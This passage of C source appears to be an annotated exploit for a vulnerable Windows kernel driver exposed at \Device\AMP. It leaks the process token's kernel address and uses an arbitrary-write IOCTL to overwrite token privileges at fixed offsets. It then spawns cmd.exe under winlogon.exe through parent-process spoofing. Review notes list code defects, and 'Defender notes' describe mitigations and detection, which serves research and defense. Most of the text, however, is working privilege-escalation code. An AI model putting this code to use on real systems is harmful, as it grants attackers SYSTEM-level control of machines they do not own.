// 0) if CreateProcessW failed, so that case is indistinguishable from success.
// main() ignores the return value.
//
// Defender notes: the spawned cmd.exe reports winlogon.exe as its parent while
// the true creator is this process. Process-creation telemetry that records
// the creating process separately from the declared parent surfaces the
// mismatch; a console cmd.exe parented to winlogon.exe is anomalous on its own.
//
// NOTE(review):
//   - pid from getProcessId() is not validated; 0 or 0xFFFFFFFF reach
//     OpenProcess and are only caught indirectly by its failure.
//   - hProcess is never closed; the HeapAlloc result and the
//     UpdateProcThreadAttribute result are unchecked.
//   - DeleteProcThreadAttributeList is never called before HeapFree.
//   - the first InitializeProcThreadAttributeList call is the documented
//     size probe and is expected to fail with ERROR_INSUFFICIENT_BUFFER.
int spawnShell()
{
    const wchar_t* process = L"winlogon.exe";
    DWORD pid;
    HANDLE hProcess;

    pid = getProcessId(process);

    if ((hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)) == NULL)
    {
        wprintf(L"\n[-] Unable to open %ws process\n\n", process);
        return -1;
    }
    wprintf(L"\n[+] Opened %ws process pid=%d with PROCESS_ALL_ACCESS rights", process, pid);

    SIZE_T size;
    STARTUPINFOEXW siex = { 0 };
    siex.StartupInfo.cb = sizeof(siex);
    siex.lpAttributeList = NULL;

    // Size probe (expected to fail), allocate, then real initialisation.
    InitializeProcThreadAttributeList(NULL, 1, 0, &size);
    siex.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)HeapAlloc(GetProcessHeap(), 0, size);
    InitializeProcThreadAttributeList(siex.lpAttributeList, 1, 0, &size);

    UpdateProcThreadAttribute(siex.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProcess, sizeof(hProcess), NULL, NULL);

    PROCESS_INFORMATION pi;
    // CreateProcessW may modify its command line, hence a writable array rather than a literal.
    WCHAR cmdPath[] = L"C:\\Windows\\System32\\cmd.exe";
    if (!CreateProcessW(NULL, cmdPath, NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOW)&siex, &pi)) {
        wprintf(L"[-] Failed to create new process.\n");
        wprintf(L" |-> %d\n", GetLastError());
        HeapFree(GetProcessHeap(), 0, siex.lpAttributeList);
        return FALSE;
    }

    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    HeapFree(GetProcessHeap(), 0, siex.lpAttributeList);

    return 0;
}
150 |
// Resolve the four ntdll exports this file uses into the file-scope function
// pointers declared at the top of the file.
//
// Returns: 1 on success, 0 if ntdll could not be located or the resolution
// check fails.
//
// NOTE(review): the failure test uses && so it only trips when ALL four
// lookups return NULL; a single missing export passes and is later called
// through a NULL pointer. The intended check is
// `if (!NtQuerySystemInformation || !RtlInitUnicodeString || !NtCreateFile || !NtDeviceIoControlFile)`.
// GetLastError() returns a DWORD, so `%d` should be `%lu`.
int init_ntdll()
{
    // ntdll is mapped into every process, so GetModuleHandleW suffices — no LoadLibrary needed.
    HMODULE hNtdll = GetModuleHandleW(L"ntdll");
    if (hNtdll == NULL)
    {
        wprintf(L"[!] Failed to load ntdll.dll! (Error code: %d)\n", GetLastError());
        return 0;
    }

    NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation");
    RtlInitUnicodeString = (pRtlInitUnicodeString)GetProcAddress(hNtdll, "RtlInitUnicodeString");
    NtCreateFile = (pNtCreateFile)GetProcAddress(hNtdll, "NtCreateFile");
    NtDeviceIoControlFile = (pNtDeviceIoControlFile)GetProcAddress(hNtdll, "NtDeviceIoControlFile");
    if (!NtQuerySystemInformation && !RtlInitUnicodeString && !NtCreateFile && !NtDeviceIoControlFile)   // NOTE(review): should be ||
    {
        wprintf(L"[!] Failed to resolve ntdll functions\n");
        return 0;
    }
    return 1;
}
171 |
// Send IOCTL_trigger_bug (METHOD_NEITHER) to the driver with `input_buffer`
// as the raw input buffer; no output buffer is supplied.
//
// Params: hDevice — handle opened by NtCreateFile in main(); input_buffer —
// the request (function_index, pointer to the argument block, and the
// ptr2_to_return address the caller wants written); inputbuffer — its size
// in bytes.
// Returns: 1 if the call returned NOERROR (0); otherwise prints the NTSTATUS
// and returns 0.
//
// NOTE(review):
//   - the parameter `input_buffer` shadows the typedef of the same name for
//     the rest of the function body.
//   - `inputbuffer` is size_t but the prototype takes ULONG — implicit narrowing.
//   - `dwbytesreturned` is passed by value as OutputBufferLength (always 0)
//     rather than receiving anything; the name is misleading.
//   - NOERROR is used here while Defs.h defines STATUS_SUCCESS for the same value.
//   - ioStatus is never inspected after the call.
int arbitrary_write(HANDLE hDevice, input_buffer* input_buffer, size_t inputbuffer)
{
    IO_STATUS_BLOCK ioStatus;
    NTSTATUS status;
    DWORD dwbytesreturned = 0;

    // Synchronous call: no event, no APC routine/context; output buffer NULL with length 0.
    status = NtDeviceIoControlFile(hDevice, NULL, NULL, NULL, &ioStatus, IOCTL_trigger_bug, input_buffer, inputbuffer, NULL, dwbytesreturned);

    if (status == NOERROR)
    {
        return 1;
    }
    else
    {
        wprintf(L"[!] arbitrary_write failed with 0x%X\n", status);
        return 0;
    }
}
190 |
// Entry point: open \Device\AMP, locate the current token in kernel memory,
// issue three IOCTL_trigger_bug requests (function_index 5) whose
// ptr2_to_return points at token+0x41, +0x49 and +0x51, then call spawnShell().
//
// Returns: 0 on success, -1 on any failure.
//
// Defender notes: the root-cause fix is driver-side — probe METHOD_NEITHER
// pointers and never honour a caller-supplied write destination. Host-side,
// HVCI together with the Microsoft vulnerable-driver blocklist prevents
// known-bad drivers from loading (whether this driver is listed is not
// established by this page). A medium-integrity process opening \Device\AMP
// is a usable detection signal in its own right.
//
// NOTE(review):
//   - hDevice is not closed when GetTokenAddress() fails.
//   - eventHandle is declared and never used.
//   - OFFSET_OF_TOKEN_PRIVILEGES (0x40) in Defs.h is not referenced; the
//     offsets here are hardcoded literals, so the macro and code can drift.
//   - `0x%p` with a UINT_PTR and `0x%X` with an NTSTATUS are format/type
//     mismatches MSVC tolerates; casting to (void*) / using %lX would be exact.
//   - NtCreateFile's result is compared with literal 0 rather than STATUS_SUCCESS.
//   - spawnShell()'s return value is ignored.
int main()
{
    if (!init_ntdll())
    {
        return -1;
    }

    NTSTATUS status;
    HANDLE hDevice, eventHandle = NULL;
    UNICODE_STRING deviceName;
    OBJECT_ATTRIBUTES objAttr;
    IO_STATUS_BLOCK ioStatus;
    // Opened via the native API by NT path; OBJ_CASE_INSENSITIVE and FILE_OPEN come from Defs.h.
    RtlInitUnicodeString(&deviceName, L"\\Device\\AMP");
    InitializeObjectAttributes(&objAttr, &deviceName, OBJ_CASE_INSENSITIVE, 0, 0);
    wprintf(L"[^] Trying to open a handle to %ws\n", deviceName.Buffer);
    status = NtCreateFile(&hDevice, GENERIC_READ | GENERIC_WRITE,
        &objAttr, &ioStatus, NULL, FILE_ATTRIBUTE_NORMAL,
        FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_OPEN, 0, NULL, 0);

    if (status != 0)
    {
        wprintf(L"[!] Failed to open a handle to %ws (NTSTATUS code: 0x%X)\n", deviceName.Buffer, status);
        return -1;
    }

    wprintf(L"[+] Opened a handle successfully %p\n", hDevice);
    wprintf(L"[*] Leaking the current token address\n");
    UINT_PTR tokenAddress = GetTokenAddress();

    if (tokenAddress == 0)
    {
        wprintf(L"[!] Failed to get the token address\n");
        return -1;   // NOTE(review): hDevice leaks here
    }

    wprintf(L"[+] Current token address: 0x%p\n", tokenAddress);

    wprintf(L"[*] Overwritting the _SEP_TOKEN_PRIVILEGES...\n");
    // One shared argument block; only ptr2_to_return differs between the three requests.
    arguments_to_func args = { 1, 10, 3, 4};
    input_buffer input_buffer1 = {5, 0, &args, (PVOID)(tokenAddress + 0x41)};
    input_buffer input_buffer2 = {5, 0, &args, (PVOID)(tokenAddress + 0x49)};
    input_buffer input_buffer3 = {5, 0, &args, (PVOID)(tokenAddress + 0x51)};

    // Short-circuit: stops at the first failed write.
    if(arbitrary_write(hDevice, &input_buffer1, sizeof(input_buffer1)) && arbitrary_write(hDevice, &input_buffer2, sizeof(input_buffer2))
        && arbitrary_write(hDevice, &input_buffer3, sizeof(input_buffer3)))
    {
        wprintf(L"[+] Overwrite was successful\n");
    }
    else
    {
        wprintf(L"[!] Overwrite failed\n");
        CloseHandle(hDevice);
        return -1;
    }

    CloseHandle(hDevice);
    wprintf(L"[*] Spawning a shell\n");
    spawnShell();

    return 0;
}
252 |
--------------------------------------------------------------------------------